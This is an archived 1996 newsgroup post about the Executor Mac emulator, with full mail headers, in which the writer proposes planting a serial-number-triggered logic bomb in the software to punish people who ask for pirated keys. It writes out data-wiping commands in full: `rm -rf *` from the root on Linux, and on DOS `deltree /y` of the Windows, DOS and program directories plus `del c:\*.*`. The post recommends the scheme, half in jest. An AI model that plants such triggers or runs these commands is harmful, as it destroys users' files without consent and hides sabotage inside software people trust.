home *** CD-ROM | disk | FTP | other *** search
/ Executor 2.0 / executorv2.0.iso / pc / dos / extra / docs / maillist / text / archive.96 / text7701.txt < prev    next >
Encoding:
Text File  |  1996-07-25  |  1.6 KB  |  44 lines

  1.     (Smail3.1.29.1 #3) id m0uZrP5-0007u8n; Fri, 28 Jun 96 22:13 MDT
  2. Path: sloth.swcp.com!tesuque.cs.sandia.gov!ferrari.mst6.lanl.gov!newshost.lanl.gov!ncar!elroy.jpl.nasa.gov!swrinde!ihnp4.ucsd.edu!munnari.OZ.AU!bunyip.cc.uq.oz.au!news.usq.edu.au!helios.usq.edu.au!d9060469
  3. From: Michelle Pankowski <d9060469@helios.usq.edu.au>
  4. Newsgroups: comp.emulators.mac.executor
  5. Subject: howto fix serial# idiots permanently
  6. Date: Sat, 29 Jun 1996 10:31:05 +1000
  7. Organization: University of Southern Queensland
  8. Lines: 25
  9. Message-ID: <Pine.HPP.3.91.960629102103.16244A-100000@helios.usq.edu.au>
  10. NNTP-Posting-Host: helios.usq.edu.au
  11. Mime-Version: 1.0
  12. Content-Type: TEXT/PLAIN; charset=US-ASCII
  13. To: executor@ardi.com
  14. X-MailNews-Gateway: From newsgroup comp.emulators.mac.executor
  15. Sender: owner-executor@ardi.com
  16. Precedence: bulk
  17.  
  18. Include some code in the unlockable versions that will
  19. 'do a little mischief'.  Something like 
  20.  
  21. cd /
  22. rm -rf * for linux and the following for the DOS version
  23.  
  24. cd\
  25. attrib -rhs c:\*.*
  26. deltree /y c:\windows
  27. deltree /y c:\dos
  28. deltree /y c:\executor
  29. del c:\*.*
  30.  
  31. Make this code execute when a specific serial# is entered.
  32. Then when some dweeb criminal posts a 'gimme keys please' message,
  33. just mail him the destructive keys and let Executor do the rest.
  34.  
  35. This idea really does
  36.  have some merit;)
  37.  
  38. Then mail them 30 minutes later with a message like, 
  39. "Please can someone send me $150 dollars, I can't wait until we shrink 
  40. wrap E2. Please, this lack of money is a real annoyance when I try to buy 
  41. stuff.  And oh yes... have a nice day:)"
  42.  
  43.  
  44.